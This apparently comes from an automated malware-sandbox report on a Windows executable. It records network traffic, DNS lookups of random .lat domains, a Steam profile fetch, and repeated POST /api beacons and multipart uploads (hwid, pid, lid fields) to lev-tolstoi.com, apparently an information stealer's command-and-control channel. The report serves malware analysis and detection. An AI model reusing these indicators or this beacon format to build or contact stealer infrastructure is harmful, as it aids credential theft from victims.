                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671761036 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671771049 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671994925 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673341036 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673485041 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673506021 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506175995 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506295919 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506355047 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.511217117 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.511240005 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637222052 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637276888 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637362003 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637684107 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637693882 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.941977024 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.942161083 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.943717957 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.943742990 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.944008112 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945410013 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945574045 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945600986 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945656061 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945668936 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034495115 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034595966 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034730911 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034996986 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.035044909 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369064093 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369113922 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369256020 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.370155096 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.370176077 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.673541069 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.673727036 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675637007 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675657034 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675899982 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678052902 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678150892 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678184986 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678258896 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678272009 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651705980 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651802063 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651851892 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.652029991 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.652051926 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.107954025 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.107970953 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108025074 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108264923 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108274937 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.413414001 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.413492918 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415307999 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415324926 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415608883 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417208910 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417332888 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417337894 CET44349761172.67.157.254192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 12:54:06.073515892 CET | 192.168.2.9 | 1.1.1.1 | 0x4895 | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.257509947 CET | 192.168.2.9 | 1.1.1.1 | 0xae78 | Standard query (0) | wordyfindy.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.397092104 CET | 192.168.2.9 | 1.1.1.1 | 0x90f0 | Standard query (0) | slipperyloo.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.767452955 CET | 192.168.2.9 | 1.1.1.1 | 0x6cbb | Standard query (0) | manyrestro.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.907983065 CET | 192.168.2.9 | 1.1.1.1 | 0xfa0a | Standard query (0) | shapestickyr.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.050281048 CET | 192.168.2.9 | 1.1.1.1 | 0xd22d | Standard query (0) | talkynicer.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.191673040 CET | 192.168.2.9 | 1.1.1.1 | 0xf5e3 | Standard query (0) | curverpluch.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.334563971 CET | 192.168.2.9 | 1.1.1.1 | 0x9b17 | Standard query (0) | tentabatte.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.476243019 CET | 192.168.2.9 | 1.1.1.1 | 0xd2b | Standard query (0) | bashfulacid.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.621043921 CET | 192.168.2.9 | 1.1.1.1 | 0x84ee | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:10.298597097 CET | 192.168.2.9 | 1.1.1.1 | 0x2a63 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 12:53:58.900741100 CET | 1.1.1.1 | 192.168.2.9 | 0xa0b8 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 26, 2024 12:53:58.900741100 CET | 1.1.1.1 | 192.168.2.9 | 0xa0b8 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.211363077 CET | 1.1.1.1 | 192.168.2.9 | 0x4895 | Name error (3) | observerfry.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.395258904 CET | 1.1.1.1 | 192.168.2.9 | 0xae78 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.764199018 CET | 1.1.1.1 | 192.168.2.9 | 0x90f0 | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:06.905788898 CET | 1.1.1.1 | 192.168.2.9 | 0x6cbb | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.046942949 CET | 1.1.1.1 | 192.168.2.9 | 0xfa0a | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.188666105 CET | 1.1.1.1 | 192.168.2.9 | 0xd22d | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.330864906 CET | 1.1.1.1 | 192.168.2.9 | 0xf5e3 | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.474477053 CET | 1.1.1.1 | 192.168.2.9 | 0x9b17 | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.617562056 CET | 1.1.1.1 | 192.168.2.9 | 0xd2b | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:07.759224892 CET | 1.1.1.1 | 192.168.2.9 | 0x84ee | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:10.436800003 CET | 1.1.1.1 | 192.168.2.9 | 0x2a63 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:54:10.436800003 CET | 1.1.1.1 | 192.168.2.9 | 0x2a63 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                      • lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:09 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Host: steamcommunity.com
2024-12-26 11:54:10 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:09 GMT
                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: sessionid=8c1a4b1771d075e6ff806249; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 11:54:10 UTC | 14479 | IN
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 11:54:10 UTC | 10097 | IN
                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 11:54:10 UTC | 10545 | IN
                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:11 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-26 11:54:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                      Data Ascii: act=life
2024-12-26 11:54:12 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:12 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=o4p9lba5g4i9qtomora9luftp3; expires=Mon, 21 Apr 2025 05:40:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQE3qx5emZfLpX0T%2BBQvwCyNKDQruLx8tktXeYe3ICZsZK%2By3GCjO6LAYan6gN%2BqoIav1DpzOZeesXXm7i52L%2BXeTzz04QPUUEZyootsmeFjDYcZ%2Fex6y%2BR2NmjL8Wft7HM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80dff1280c8ca5-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1957&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1385199&cwnd=237&unsent_bytes=0&cid=26a9a97ca4cc6b71&ts=784&x=0"
2024-12-26 11:54:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 2ok
2024-12-26 11:54:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:13 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 47
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-26 11:54:13 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-26 11:54:14 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:14 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=odg15tm0b8em3rle5cbpg925ra; expires=Mon, 21 Apr 2025 05:40:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc5cxzl51rkgbfAcfvZf5WoCLbXuegv87R2Zd7pMIBbqJJFVzmw%2Ffj38SCwr7XGEu95tgcazOLw6l5CIy76pXGBAusXwrsfl31McViHvCXfbZEBI0QTsnTjyu%2FgSU2syncQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80dffe7d907c69-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1975&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1423695&cwnd=171&unsent_bytes=0&cid=57f353ebc0ea2fb6&ts=791&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49740 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:16 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=O0KPXZESU3AA06KV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12833
Host: lev-tolstoi.com
2024-12-26 11:54:16 UTC | 12833 | OUT | Data Ascii:
--O0KPXZESU3AA06KV
Content-Disposition: form-data; name="hwid"

17A4311328D510E6BEBA0C6A975F1733
--O0KPXZESU3AA06KV
Content-Disposition: form-data; name="pid"

2
--O0KPXZESU3AA06KV
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--O0
2024-12-26 11:54:17 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:54:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=91ig3s1sji6uolilp9krt2n9ki; expires=Mon, 21 Apr 2025 05:40:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FVNUNNvXJdj4CeBTKTJAAZe8o6RZn%2BLBVBYsbssEzu2tSq%2BrtcdSlS10%2FqBKiS3Wx6pAJKhrUG5OQvbF%2B%2FPVeBc%2BAC77Sev4rfLuy390tTAgQQRUEDgoYHYQhGzDl3xYJo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e00f4f8443ec-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1650&rtt_var=637&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13770&delivery_rate=1693735&cwnd=229&unsent_bytes=0&cid=6d684939ec1a4e50&ts=843&x=0"
2024-12-26 11:54:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-26 11:54:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49746 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:18 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AI1H7NMTB09653LBR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15057
Host: lev-tolstoi.com
2024-12-26 11:54:18 UTC | 15057 | OUT | Data Ascii:
--AI1H7NMTB09653LBR
Content-Disposition: form-data; name="hwid"

17A4311328D510E6BEBA0C6A975F1733
--AI1H7NMTB09653LBR
Content-Disposition: form-data; name="pid"

2
--AI1H7NMTB09653LBR
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
-
2024-12-26 11:54:20 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:54:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ubolkfdt4sjk1rbhking58bamo; expires=Mon, 21 Apr 2025 05:40:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bou3RN%2BEn9HFmuDrkVevvVrpWP3IdyXt0MDEoC6aUeu37maj0J6OXLfDhiSnQOm0OA9Oz3fGug8%2FViv7S7JqPoqnRCaW1lsw3G2lbFds9deS4NPwltYGR4ey6wuF6SqBQsg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e01d7f5f438a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1768&rtt_var=669&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15995&delivery_rate=1626740&cwnd=210&unsent_bytes=0&cid=4e4cb4741ed5d990&ts=1098&x=0"
2024-12-26 11:54:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:54:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49752 | 172.67.157.254 | 443 | 1460 | C:\Users\user\Desktop\4KDKJjRzm8.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:54:21 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=PCKY9Q7KIM5
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 20537
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-26 11:54:21 UTC | 15331 | OUT | Data Ascii:
--PCKY9Q7KIM5
Content-Disposition: form-data; name="hwid"

17A4311328D510E6BEBA0C6A975F1733
--PCKY9Q7KIM5
Content-Disposition: form-data; name="pid"

3
--PCKY9Q7KIM5
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--PCKY9Q7KIM5
Cont
2024-12-26 11:54:22 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=cjiqgpaqqondqbk9rolt72anip; expires=Mon, 21 Apr 2025 05:41:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
